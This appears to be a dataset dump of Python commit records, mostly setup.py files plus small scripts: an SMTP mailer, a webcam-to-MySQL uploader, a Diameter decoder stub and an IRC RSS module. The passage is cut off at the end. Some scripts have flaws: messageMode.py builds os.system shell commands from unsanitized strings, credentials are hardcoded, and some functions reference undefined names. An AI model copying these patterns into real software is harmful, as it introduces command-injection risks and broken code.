commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
45e624fe5176dd59b8f42636b777a1b6a6106dca | Add initial setuptools integration, required by click | setup.py | setup.py | # -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
from setuptools import setup
setup(
name='loafer',
version='0.0.1',
entry_points='''
[console_scripts]
loafer=loafer.cli:cli
''',
)
| Python | 0 | |
81e7e9ed4b3b0f6840e11adc5c73648471f606ef | Add setup.py | setup.py | setup.py | # coding: utf-8
from __future__ import print_function, unicode_literals
import sys
from setuptools import setup
install_requires = []
if sys.version_info[0] == 2:
install_requires.append('statistics')
setup(
name='scrapy-slotstats',
version='0.1',
license='MIT License',
description='Scrapy extension to show statistics of downloader slots',
author='orangain',
author_email='orangain@gmail.com',
url='https://github.com/orangain/scrapy-slotstats',
keywords="scrapy downloader slot stats",
py_modules=['scrapy_slotstats'],
platforms=['Any'],
install_requires=install_requires,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Framework :: Scrapy',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
]
)
| Python | 0.000001 | |
21380bcf76a8144d182166c3441d308af2eda417 | Add first pass at setup.py | setup.py | setup.py | #!/usr/bin/python
import os
from distutils.core import setup, Extension
ext_modules = []
packages = ['bayesdb', 'bayesdb.tests']
setup(
name='BayesDB',
version='0.1',
author='MIT.PCP',
author_email = 'bayesdb@mit.edu',
url='probcomp.csail.mit.edu/bayesdb',
long_description='BayesDB',
packages=packages,
package_dir={'bayesdb':'bayesdb/'},
ext_modules=ext_modules,
)
| Python | 0 | |
374e27087d6d432ba01a0ef65c4109be84e50dcf | Add setup.py | setup.py | setup.py | import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
try:
from distutils.command.build_py import build_py_2to3 as build_py
except ImportError:
from distutils.command.build_py import build_py
path, script = os.path.split(sys.argv[0])
os.chdir(os.path.abspath(path))
# Don't import rjmetrics module here, since deps may not be installed
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'rjmetrics'))
from version import VERSION
install_requires = ['requests >= 0.8.8']
# Get simplejson if we don't already have json
if sys.version_info < (3, 0):
try:
from util import json
except ImportError:
install_requires.append('simplejson')
setup(
name='rjmetrics',
cmdclass={'build_py': build_py},
version=VERSION,
description='Python client for RJMetrics APIs',
author='RJMetrics',
author_email='support@rjmetrics.com',
url='https://rjmetrics.com/',
packages=['rjmetrics', 'rjmetrics.test'],
package_data={'rjmetrics': ['../VERSION']},
install_requires=install_requires,
test_suite='rjmetrics.test.all',
use_2to3=True,
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
])
| Python | 0.000001 | |
9c05031446d0d17bdc207b00ebf47d9769f96d33 | Add a setup.py for owebunit to be able to obtain ocookie via pip | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name='ocookie',
version='0.1',
description='Comprehensive cookie library',
author='Oleg Pudeyev',
author_email='oleg@bsdpower.com',
url='http://github.com/p/ocookie',
packages=['ocookie'],
)
| Python | 0 | |
431acaabf7a3e77b416a57998bfadcb2d3864555 | Add a setup.py | setup.py | setup.py | from setuptools import setup, find_packages
import codecs
import os
import re
setup(
name="httpbin",
version="0.1.0",
description="HTTP Request and Response Service",
# The project URL.
url='https://github.com/kennethreitz/httpbin',
# Author details
author='Kenneth Reitz',
author_email='me@kennethreitz.com',
# Choose your license
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
],
packages=find_packages(),
install_requires=['Flask','MarkupSafe','decorator','itsdangerous','six'],
)
| Python | 0 | |
82b8651c9eed0c19224c8a7b53a0bedae81337a3 | Add a setup.py. | setup.py | setup.py |
from setuptools import setup, find_packages
setup(
name = "WebStar",
version = "0.1b",
author="Mike Boers",
author_email="webstar@mikeboers.com",
license="BSD-3"
)
| Python | 0 | |
d157b4e1f4709b0205d5de31df65a5308f926d49 | Add setup.py | setup.py | setup.py | #!/usr/bin/env python
# coding: utf-8
import re
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
version = ""
with open("autumn.py", "r") as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
f.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError("No version information")
setup(name="autumn",
version=version,
description="A simple Pythonic MySQL ORM.",
author="ushuz",
url="https://github.com/ushuz/autumn",
py_modules=["autumn"],
license="MIT License",
)
| Python | 0.000001 | |
a2bfe07ba67e902870dd366626b23dbb5e6e2696 | Create messageMode.py | messageMode.py | messageMode.py |
#!/usr/bin/python
#coding=utf-8
#filename: messageMode.py
import telnetlib
import os,sys,commands,multiprocessing
import smtplib
import time
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
import urllib2
#---init---
begintime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
muti_phone='13521161000'
muti_mail='yhf@XXXX.com'
pythonlog ='/home/sms_mail.log'
sender = 'hxx@163.com'
smtpserver = 'hxx.163.com'
username = 'hxx@163.com'
password = 'password'
#----------
def sendtxtmail(_subject,_mail_off,_msg,_fuc_mail,_begintime):
for mail_index in range(0, len(_fuc_mail.split(';'))):
if _mail_off == 1:
break
_receiver = _fuc_mail.split(';')[mail_index]
if _receiver.find('null') == -1:
try:
msg = MIMEText('<html>'+_msg+'</html>','html','utf-8')
msg['Subject'] = _subject
msg['to'] = _receiver
smtp = smtplib.SMTP()
smtp.connect(smtpserver)
smtp.login(username, password)
smtp.sendmail(sender,_receiver, msg.as_string())
smtp.quit()
os.system("echo "+_begintime+' '+_subject+' '+_receiver+" mail send successful >> "+pythonlog)
print "mail send successful"
except Exception,e:
print "mail send fail"
print e[1]
os.system("echo "+_begintime+' '+_subject+' '+_receiver+" mail send fail ,Code: "+str(e[0])+' '+e[1].split()[0]+'- -! >>'+pythonlog)
return 'mail func over'
def main(arg_msg):
sendtxtmail('test_subject',0,arg_msg,muti_mail,begintime)
return 'main func over'
if __name__ == "__main__":
print main(sys.argv[1])
| Python | 0.000001 | |
3d020f09332093807f70a1bca5360e1418633bb4 | Add setup.py. | setup.py | setup.py | from setuptools import setup, find_packages
setup(name='Anytask',
packages=find_packages(),
)
| Python | 0 | |
b38eb4f8a7b8e3400ea09c600e241d8c4a9d0846 | Add setup so sgfs can install this to test with | setup.py | setup.py | from distutils.core import setup
setup(
name='sgsession',
version='0.1-dev',
description='Shotgun ORM/Session.',
url='http://github.com/westernx/sgsession',
packages=['sgsession'],
author='Mike Boers',
author_email='sgsession@mikeboers.com',
license='BSD-3',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Topic :: Software Development :: Libraries :: Python Modules',
],
) | Python | 0 | |
5263a684d4bd111b903456a8da2c92ddb25e7811 | Add migration | seriesly/series/migrations/0002_auto_20180127_0718.py | seriesly/series/migrations/0002_auto_20180127_0718.py | # Generated by Django 2.0 on 2018-01-27 13:18
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('series', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='show',
name='added',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AlterField(
model_name='show',
name='country',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='show',
name='network',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='show',
name='timezone',
field=models.CharField(blank=True, max_length=255),
),
]
| Python | 0.000002 | |
874fbb6749d60ea3fcf078d25d7911d7ac314ab1 | Add a setup.py file for use with python install tools. | setup.py | setup.py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'File validator',
'author': 'Iestyn Pryce',
'url': '',
'download_url': '',
'author_email': 'iestyn.pryce@gmail.com',
'version': '0.1',
'install_requires': ['nose'],
'packages': ['validator'],
'scripts': ['bin/validate_file.py'],
'name': 'validator'
}
setup(**config)
| Python | 0 | |
3258a5ba8c748ce079082c34d13b231f157b1463 | Add experimental top-level copy of setup.py | setup.py | setup.py | #!/usr/bin/env python
# Original libphonenumber Java code:
# Copyright (C) 2009-2011 The Libphonenumber Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import distutils.core
import sys
# Importing setuptools adds some features like "setup.py test", but
# it's optional so swallow the error if it's not there.
try:
import setuptools
except ImportError:
pass
major, minor = sys.version_info[:2]
python_25 = (major > 2 or (major == 2 and minor >= 5))
if not python_25:
raise RuntimeError("Python 2.5 or newer is required")
python_3x = (major >= 3)
if python_3x:
package_name = 'phonenumbers3k'
dev_status = 'Development Status :: 3 - Alpha'
else:
package_name = 'phonenumbers'
dev_status = 'Development Status :: 4 - Beta'
# Add ./python/ subdirectory to path
sys.path.append('python')
# Discover version of phonenumbers package
from phonenumbers import __version__
distutils.core.setup(name=package_name,
version=__version__,
description="Python version of Google's common library for parsing, formatting, storing and validating international phone numbers.",
author='David Drysdale',
author_email='dmd@lurklurk.org',
url='https://github.com/daviddrysdale/python-phonenumbers',
license='Apache License 2.0',
packages=['phonenumbers', 'phonenumbers.data', 'phonenumbers.geodata'],
package_dir={'': 'python'},
test_suite="tests",
platforms='Posix; MacOS X; Windows',
classifiers=[dev_status,
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Topic :: Communications :: Telephony',
],
)
| Python | 0 | |
58dd2d188aab1fbf30ff843307eecf5ca685527c | Add setup | setup.py | setup.py | from setuptools import find_packages, setup
setup(
name='ngx-task',
version='0.1',
description='Testimonial for candidates to show up their code-foo',
author='Dmitry Shulyak',
author_email='dmitri.shulyak@gmail.com',
url='https://github.com/shudmi/ngx-task',
classifiers=[
'License :: Apache License 2.0',
'Programming Language :: Python',
'Programming Language :: Python 3',
'Programming Language :: Python 3.4',
],
packages=find_packages(exclude=['tests', 'tests.*']),
install_requires=[],
entry_points="""
[console_scripts]
ngx_generate=ngx_task.cli.generate_data
ngx_process=ngx_task.cli.process_data
"""
)
| Python | 0.000001 | |
90746eba08c67c4f62462ed74d08566cafa18724 | Add setup.py | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='wrenet',
version='0.1',
description='Network configurations viewer in the Windows Registry',
author='graypawn',
author_email='choi.pawn' '@gmail.com',
url='https://github.com/graypawn/wrenet',
license='Apache License (2.0)',
packages=find_packages(),
install_requires = {'python-registry >= 1.0.0'},
classifiers = ["Programming Language :: Python",
"Programming Language :: Python :: 3",
"Operating System :: POSIX :: Linux",
"License :: OSI Approved :: Apache Software License"],
entry_points={
'console_scripts': [
'wrenet=wrenet.wrenet:main'
]
}
)
| Python | 0.000001 | |
50742b6e629e6f54a9f3784a3c1495eb9d82c238 | Add start of processed package | brightway_projects/processing/processed_package.py | brightway_projects/processing/processed_package.py | from ..errors import InconsistentFields, NonUnique
def greedy_set_cover(data, exclude=None):
"""Find unique set of attributes that uniquely identifies each element in ``data``.
Feature selection is a well known problem, and is analogous to the `set cover problem <https://en.wikipedia.org/wiki/Set_cover_problem>`__, for which there is a `well known heuristic <https://en.wikipedia.org/wiki/Set_cover_problem#Greedy_algorithm>`__.
Args:
data (iterable): List of dictionaries with the same fields.
exclude (iterable): Fields to exclude during search for uniqueness. ``id`` is Always excluded.
Returns:
Set of attributes (strings)
Raises:
NonUnique: The given fields are not enough to ensure uniqueness
"""
if exclude is None:
exclude = {"id"}
else:
exclude = set(exclude)
exclude.add("id")
def as_unique_attributes(data, exclude=None, include=None):
"""Format ``data`` as unique set of attributes and values for use in ``create_processed_datapackage``.
Note: Each element in ``data`` must have the attributes ``id``.
data = [
{},
]
Args:
data (iterable): List of dictionaries with the same fields.
exclude (iterable): Fields to exclude during search for uniqueness. ``id`` is Always excluded.
include (iterable): Fields to include when returning, even if not unique
Returns:
(list of field names as strings, dictionary of data ids to values for given field names)
Raises:
InconsistentFields: Not all features provides all fields.
"""
include = set([]) if include is None else set(include)
fields = greedy_set_cover(data, exclude)
if len({set(obj.keys()) for obj in data}) > 1:
raise InconsistentFields
def formatter(obj, fields, include):
return {
key: value
for key, value in obj.items()
if (key in fields or key in include or key == "id")
}
return (fields, [formatter(obj, fields, include) for obj in data])
def create_processed_datapackage(
array,
rows,
cols,
filepath=None,
id_=None,
metadata=None,
replace=True,
compress=True,
in_memory=False,
):
"""Create a datapackage with numpy structured arrays and metadata.
Exchanging large, dense datasets like MRIO tables is not efficient if each exchange must be listed separately. Instead, we would prefer to exchange the processed arrays used to build the matrices directly. However, these arrays use integer indices which are not consistent across computers or even Brightway projects. This function includes additional metadata to solve this problem, mapping these integer ids to enough attributes to uniquely identify each feature. Separate metadata files are included for each column in the array (i.e. the row and column indices).
Args:
array (numpy structured array): The numeric data. Usually generated via ``create_numpy_structured_array``.
rows (dict): Dictionary mapping integer indices in ``row_value`` to a dictionary of attributes.
cols (dict): Dictionary mapping integer indices in ``col_value`` to a dictionary of attributes.
Returns:
Something :)
"""
pass
| Python | 0 | |
c68cda0549bb9c47be0580ecd43f55966e614b31 | Add Pascal's Triangle/nCr Table | mathematics/combinatorics/ncr_table/kevin.py | mathematics/combinatorics/ncr_table/kevin.py | #!/usr/bin/env python
# https://www.hackerrank.com/challenges/ncr-table
def get_number():
return int(input().strip())
def nCr(row_number):
rows = [[1], [1, 1], [1, 2, 1]]
while row_number >= len(rows):
# 1
# 1 1
# 1 2 1
# 1 4 4 1
# .......
row = [(rows[-1][index] + rows[-1][index + 1])
for index in range(len(rows) - 1)]
rows.append([1] + row + [1])
# Spew elements with * to show the proper output
print(*rows[row_number])
# Generate this row from the nCr table
inputs = []
number_of_items = get_number()
for i in range(number_of_items):
pascals_row = get_number()
inputs.append(pascals_row)
print()
[nCr(item) for item in inputs]
| Python | 0.000004 | |
842869063ead9b2e6a1e22d11c9901072f2319aa | Add script to self generate docs for recurring data types | docs/generate_spec.py | docs/generate_spec.py | # -*- encoding: utf-8 -*-
#
# This script is to be used to automagically generate the recurring data types
# documentation based on the API specification.
#
# to run it just do:
#
# $ python generate_spec.py > outputfile.md
#
# :authors: Arturo Filastò
# :licence: see LICENSE
import inspect
from globaleaks.rest.messages import base
def create_spec(spec):
doc = ""
for k, v in spec.items():
doc += " %s: %s\n" % (k, v)
return doc
def create_class_doc(klass):
doc = "## %s\n" % klass.__name__
if klass.__doc__:
docstring = [line.strip() for line in klass.__doc__.split("\n")]
doc += '\n'.join(docstring)
doc += "\n"
doc += create_spec(klass.specification)
return doc
for name, klass in inspect.getmembers(base, inspect.isclass):
if issubclass(klass, base.GLTypes) and klass != base.GLTypes:
print create_class_doc(klass)
| Python | 0 | |
7d23ad49da0044d83f781105cb01addb1a4aa41c | Add catalog.wsgi file | catalog.wsgi | catalog.wsgi | #!/usr/bin/python
import sys
sys.path.insert(0,"/var/www/html/catalog/")
from catalog import app as application
application.secret_key = 'super_secret_key'
| Python | 0 | |
dd5ae6788b4bb3630c16ce0996b206ae5e26228f | Extract env seq | scripts/extract_paths.py | scripts/extract_paths.py | import glob
import sys
import avidaspatial
num = sys.argv[1]
env_id = sys.argv[2]
filenames = glob.glob("*"+env_id+"*/lineage_locs_"+num+".dat")
env = avidaspatial.parse_environment_file("../config/env"+env_id+".cfg", (60, 60))
outfile = open("paths_"+num+"_"+env_id+".dat", "w")
outfile_env = open("env_seq_"+num+"_"+env_id+".dat", "w")
for name in filenames:
infile = open(name)
path = infile.readline().split()[1:-1]
infile.close()
path = [int(i) for i in path]
path = [[i % 60, i // 60] for i in path]
outfile.write(str(path) + "\n")
env_seq = []
for loc in path:
env_seq.append(sorted(list(env[loc[1]][loc[0]])))
outfile_env.write(",".join([str(i) for i in env_seq]) + "\n")
outfile.close()
outfile_env.close()
| import glob
import sys
import avidaspatial
num = sys.argv[1]
env = sys.argv[2]
filenames = glob.glob("*"+env+"*/lineage_locs_"+num+".dat")
env = avidaspatial.parse_environment_file("../config/env"+env+".cfg", (60, 60))
outfile = open("paths_"+num+"_"+env+".dat", "w")
outfile_env = open("env_seq_"+num+"_"+env+".dat", "w")
for name in filenames:
infile = open(name)
path = infile.readline().split()[1:-1]
infile.close()
path = [int(i) for i in path]
path = [[i % 60, i // 60] for i in path]
outfile.write(str(path) + "\n")
env_seq = []
for loc in path:
env_seq.append(sorted(list(env[loc[1]][loc[0]])))
outfile_env.write(",".join([str(i) for i in env_seq]) + "\n")
outfile.close()
outfile_env.close()
| Python | 0.999944 |
c16fae0519068e40d7b1ed988f49460198f6fd43 | Create decode_diameter.py | decode_diameter.py | decode_diameter.py | #-------------------------------------------------------------------------------
# Name: Decode Diameter
# Purpose:
#
# Author: XIAO Zhen
#
# Created: 08/10/2014
# Copyright: (c) XIAO Zhen 2014
# Licence: MIT License
#-------------------------------------------------------------------------------
#!/usr/bin/env python
import os
import sys
def logerr(msg):
print "Error: " + msg
def loginfo(msg):
print "Info : " + msg
def output(msg):
print msg
def loadAvpDefineFile(filename):
d = dict()
try:
file = open(filename,'r')
except:
logerr("Cannot open file:" + filename)
return d
cur_avp = '-1'
detail = []
for line in file.readlines():
if(line[:4] == 'avp '):
if(cur_avp != '-1'):
d[cur_avp] = detail
detail = []
cur_avp = line.split()[1]
if(cur_avp in d):
cur_avp = '-1'
elif(line.find("VENDOR_ID") != -1 and cur_avp != '-1'):
cur_avp += ':' + line.split()[2][:-1]
elif(line.find('DATA_TYPE') != -1):
detail.append(line.split()[2][:-1])
elif(line.find('AVP_NAME') != -1):
detail.append(line.split()[2][1:-2])
file.close()
return d
def decode(avps,hex):
'''
0. Grouped
1. OctetString
2. OctetString
3. Int32
4. Int64
5. UInt32
6. UInt64
9. Address
10.Time
11.Diameter-Identify
12.DiameterURI
13.Enum
459:0
['13', 'User-Equipment-Info-Type']
'''
i = 0
if(hex[i:i + 2] != '01'):
logerr("This is not a diameter message!")
return
i += 2
offset = []
offset.append(eval('0x' + hex[i:i+6]) - 8)
def main():
#use the the directory where the script located as current work dir
os.chdir(os.path.dirname(sys.argv[0]))
#load the avp define file
file_name_avp_define = "Avpdefine.avp"
avps = loadAvpDefineFile(file_name_avp_define)
i = 0
for avp in avps:
print avp
print avps[avp]
i += 1
if(i == 10):
break
hex = '-'
decode(avps,hex)
if __name__ == '__main__':
main()
| Python | 0.000327 | |
8968251b7e1b89171b285e377d17dae299019cd0 | Test that '--checks' accepts notebooks either before or after the check command (#887) | tests/test_cli_check.py | tests/test_cli_check.py | import pytest
from nbformat.v4.nbbase import new_code_cell, new_notebook
from jupytext import write
from jupytext.cli import jupytext
from .utils import requires_black
@pytest.fixture
def non_black_notebook(python_notebook):
return new_notebook(metadata=python_notebook.metadata, cells=[new_code_cell("1+1")])
@requires_black
def test_check_notebooks_left_or_right_black(python_notebook, tmpdir, cwd_tmpdir):
write(python_notebook, str(tmpdir / "nb1.ipynb"))
write(python_notebook, str(tmpdir / "nb2.ipynb"))
jupytext(["*.ipynb", "--check", "black --check {}"])
jupytext(["--check", "black --check {}", "*.ipynb"])
@requires_black
def test_check_notebooks_left_or_right_not_black(
non_black_notebook, tmpdir, cwd_tmpdir
):
write(non_black_notebook, str(tmpdir / "nb1.ipynb"))
write(non_black_notebook, str(tmpdir / "nb2.ipynb"))
with pytest.raises(SystemExit):
jupytext(["*.ipynb", "--check", "black --check {}"])
with pytest.raises(SystemExit):
jupytext(["--check", "black --check {}", "*.ipynb"])
| Python | 0 | |
4694f6bf2405d0aae5e6c3fc393f8a839e8aac07 | Add tests for converter.Line and converter.Generator. | tests/test_converter.py | tests/test_converter.py | # coding: utf-8
# Copyright (c) 2010-2012 Raphaël Barrois
import unittest
from confmgr import converter
class LineTestCase(unittest.TestCase):
def test_repr(self):
self.assertEqual("Line('foo', 'bar')",
repr(converter.Line('foo', 'bar')))
def test_equality(self):
self.assertEqual(
converter.Line('foo', 'bar'),
converter.Line('foo', 'bar'))
self.assertNotEqual(
converter.Line('foo', 'bar'),
converter.Line('foo', 'baz'))
self.assertNotEqual(
converter.Line('foo', 'bar'),
converter.Line('fo', 'bar'))
def test_compare_to_other(self):
self.assertNotEqual('foo', converter.Line('foo', 'bar'))
self.assertNotEqual(converter.Line('foo', 'bar'), 'foo')
def test_hash(self):
s = set()
for _i in range(5):
s.add(converter.Line('foo', 'bar'))
self.assertEqual(1, len(s))
self.assertEqual(set([converter.Line('foo', 'bar')]), s)
def test_fill_original_normal(self):
l = converter.Line('foo', None)
self.assertEqual(None, l.original)
l.fill_original()
self.assertEqual('foo', l.original)
def test_fill_original_comment(self):
l = converter.Line('#@foo', None)
self.assertEqual(None, l.original)
l.fill_original()
self.assertEqual('#@@foo', l.original)
l = converter.Line('"@foo', None)
self.assertEqual(None, l.original)
l.fill_original()
self.assertEqual('"@@foo', l.original)
l = converter.Line('!@foo', None)
self.assertEqual(None, l.original)
l.fill_original()
self.assertEqual('!@@foo', l.original)
class GeneratorTestCase(unittest.TestCase):
def test_no_special(self):
txt = [
'foo',
'bar',
'baz',
]
g = converter.Generator(txt, categories=[], fs=None)
expected = [converter.Line(s, s) for s in txt]
out = list(g)
self.assertItemsEqual(expected, out)
if __name__ == '__main__':
unittest.main()
| Python | 0 | |
a37640d107d1dd58ba4f9db3e043020ad76cd25d | Create cam_control.py | cam_control.py | cam_control.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from cv2 import *
import MySQLdb as ms
import time
import _mysql_exceptions as M
import os
def get_image():
cam1 = VideoCapture(0)
cam2 = VideoCapture(1)
s1, img1 = cam1.read()
s2, img2 = cam2.read()
if s1:
imwrite("test1.jpg",img)
if s2:
imwrite("test2.jpg",img)
def read_image():
fin1 = open("test1.jpg")
fin2 = open("test2.jpg")
img1 = fin1.read()
img2 = fin2.read()
return img1,img2
def query() :
try :
db = ms.connect(host="your_host_name",user="your_user_name",\
passwd="your_password",db="your_database_name")
except(M.OperationalError):
print '\n', "########ISSUE_%s_Mysqldatabase_########" % ("your_host_name")
print "########RPi_CANT_REACH_DATABASE########"
print "########CHECK_WIRES_FROM_RPI_TO_INTERNETPROVIDER'S_ROOTER(BOX)##"
os.system("sudo reboot")
data1 = read_image()[0]
data2 = read_image()[1]
try :
#set up of a cursor to be able to execute a query in database.
c = db.cursor()
date = time.strftime("%a, %d, %b %Y %H:%M:%S", time.gmtime())
c.execute("INSERT INTO images(date,cam1,cam2) VALUES (%s,%s,%s)", (date,data1,data2))
print "<--- Send image --->","--- / date / --- : ",date
except(NameError) :
#os.system("sudo reboot")
print "NameError: ", NameError
if __name__ == "__main__" :
while True :
get_image()
try :
query()
#print "Ok test.jpg image found"
except :
print "No test.jpg image found"
#cam get .jpg file and send an image \
#every 30 minutes=1800 seconds
#every 5minutes = 300 seconds
time.sleep(300)
| Python | 0.000001 | |
d2a283856a9e2559a131c5aaa2407477be993af0 | add file to help gather all the data we need | collate.py | collate.py | import csv
from glob import glob
def collate_from_breath_meta(cohort):
"""
Gets all breath_meta.csv files in our specific cohort and then gets all
the data from these files and stores them in a dictionary.
"""
if cohort not in ["ardscohort", "controlcohort"]:
raise Exception("Input must either be ardscohort or controlcohort")
dirs = os.listdir(cohort)
cohort_files = []
for dir in dirs:
files = glob("{}/{}/0*_breath_meta.csv".format(cohort, dir))
for f in files:
cohort_files.append(f)
data = []
for f in cohort_files:
with open(f) as meta:
reader = csv.reader(meta)
for line in reader:
data.append(line)
return data
if __name__ == "__main__":
main()
| Python | 0 | |
d2667faded6dfdd1fb2992ec188b8fed12bb2723 | Add ncurses 5.9 | packages/ncurses.py | packages/ncurses.py | class NcursesPackage (GnuPackage):
def __init__ (self):
GnuPackage.__init__ (self, 'ncurses', '5.9')
self.sources.extend ([
'https://trac.macports.org/export/136235/trunk/dports/devel/ncurses/files/hex.diff',
'https://trac.macports.org/export/136235/trunk/dports/devel/ncurses/files/ungetch_guard.diff',
'https://trac.macports.org/export/136235/trunk/dports/devel/ncurses/files/configure.diff',
'https://trac.macports.org/export/136235/trunk/dports/devel/ncurses/files/constructor_types.diff',
'https://trac.macports.org/export/136235/trunk/dports/devel/ncurses/files/pkg_config_libdir.diff'
])
def prep (self):
Package.prep (self)
if Package.profile.name == 'darwin':
for p in range (1, len (self.sources)):
self.sh ('patch -p0 --ignore-whitespace < "%{sources[' + str (p) + ']}"')
def make (self):
self.local_make_flags.extend (['-DPKG_CONFIG_LIBDIR=%s' % self.PKG_CONFIG_PATH])
Package.make (self)
NcursesPackage ()
| Python | 0.000015 | |
00bfd02f921a42d4f288254d1accb7546d8df2c5 | Add hbase consistency check throw hbase hbck command, easily can be added some checks like backups servers or region servers | check_hbase.py | check_hbase.py | #!/usr/bin/env python
# vim: ts=4:sw=4:et:sts=4:ai:tw=80
from utils import krb_wrapper,StringContext
import os
import argparse
import nagiosplugin
import re
import subprocess
html_auth = None
def parser():
version="0.1"
parser = argparse.ArgumentParser(description="Checks datanode")
parser.add_argument('-p', '--principal', action='store', dest='principal')
parser.add_argument('-s', '--secure',action='store_true')
parser.add_argument('-k', '--keytab',action='store')
parser.add_argument('--cache_file',action='store', default='/tmp/nagios.krb')
parser.add_argument('-v','--version', action='version', version='%(prog)s ' + version)
args = parser.parse_args()
if args.secure and (args.principal is None or args.keytab is None):
parser.error("if secure cluster, both of --principal and --keytab required")
return args
class Hbase(nagiosplugin.Resource):
def __init__(self):
p = subprocess.Popen(['hbase','hbck'],stdout=subprocess.PIPE,stderr=None)
output,err = p.communicate()
self.status=None
if err is None:
for line in output.splitlines():
m = re.match('^\s*Status\s*:\s*(?P<STATUS>\w+)\s*',line)
if m:
self.status=m.group('STATUS')
else:
return 2,"Critical: "+err
def probe(self):
yield nagiosplugin.Metric('status',self.status,context="status")
@nagiosplugin.guarded
def main():
args = parser()
if args.secure:
auth_token = krb_wrapper(args.principal,args.keytab,args.cache_file)
os.environ['KRB5CCNAME'] = args.cache_file
check = nagiosplugin.Check(Hbase(),
StringContext('status',
'OK'))
check.main()
if auth_token: auth_token.destroy()
if __name__ == '__main__':
main()
| Python | 0 | |
f865bf2d7365ccecec07be7e51e8d81676f3aae2 | Add check_cycles tests module | tests/plantcv/morphology/test_check_cycles.py | tests/plantcv/morphology/test_check_cycles.py | import cv2
from plantcv.plantcv import outputs
from plantcv.plantcv.morphology import check_cycles
def test_check_cycles(morphology_test_data):
# Clear previous outputs
outputs.clear()
mask = cv2.imread(morphology_test_data.ps_mask, -1)
_ = check_cycles(mask)
assert outputs.observations['default']['num_cycles']['value'] == 16
| Python | 0 | |
1ab296398aaa796a9a5b620c4281d9376ada8b3e | Add short script which prints the entire CMIP6 MIP experiment list #197. | ece2cmor3/scripts/mip-experiment-list.py | ece2cmor3/scripts/mip-experiment-list.py | #!/usr/bin/env python
# Thomas Reerink
#
# Run example:
# python mip-experiment-list.py
#
# Looping over all MIPs and within each MIP over all its MIP experiments.
# Printing the MIP experiment list with some additional info.
#
from dreqPy import dreq
dq = dreq.loadDreq()
mip_list_file= open( 'mip-experiment-list.txt', 'w' )
# Loop over the MIPs:
for mip in dq.coll['mip'].items:
# Loop over the MIP experiments:
for u in dq.inx.iref_by_sect[mip.uid].a['experiment']:
ex = dq.inx.uid[u]
mip_list_file.write( '{:20} {:20} {:30} {:3} {}'.format(mip.label, ex.mip, ex.label, ex.tier[0], ex.title) + '\n')
#print '{:20} {:20} {:30} {:3} {}'.format(mip.label, ex.mip, ex.label, ex.tier[0], ex.title)
mip_list_file.close()
| Python | 0 | |
6d6edeb5e1acfdc3dce2660d128a0bbf05203d87 | add rss module | modules/rss.py | modules/rss.py | # -*- coding: ISO-8859-15 -*-
import md5, time
from xml.dom import minidom
from twisted.internet import reactor
from twisted.internet.defer import inlineCallbacks
from twisted.web import client
from core.Uusipuu import UusipuuModule
class Module(UusipuuModule):
def startup(self):
if 'feeds' not in self.config or \
type(self.config['feeds']) != type({}):
self.config['feeds'] = {}
self.items = {}
for feed in self.config['feeds']:
self.items[feed] = []
self.query_feed(feed)
def cmd_rssreset51515(self, user, replyto, params):
name = params.strip()
for feed in self.items:
for item in self.items[feed][:]:
if item['title'] == name:
self.items[feed].remove(item)
self.chanmsg('Ok, removing an item')
return
self.chanmsg('No items found :(')
def cmd_rss(self, user, replyto, params):
pieces = params.strip().split(' ', 1)
if not len(pieces) or not len(pieces[0]):
self.chanmsg('Usage: !rss <add|remove|list|refresh> [...]')
return
if pieces[0].strip() in \
('add', 'remove', 'latest', 'refresh', 'list', 'addfilter',
'removefilter'):
mname = 'do_' + pieces[0].strip()
params = ''
if len(pieces) >= 2:
params = pieces[1].strip()
if hasattr(self, mname):
getattr(self, mname)(user, params)
def do_add(self, user, params):
pieces = params.split()
if len(pieces) < 2:
self.chanmsg('Usage !rss add <name> <url>')
return
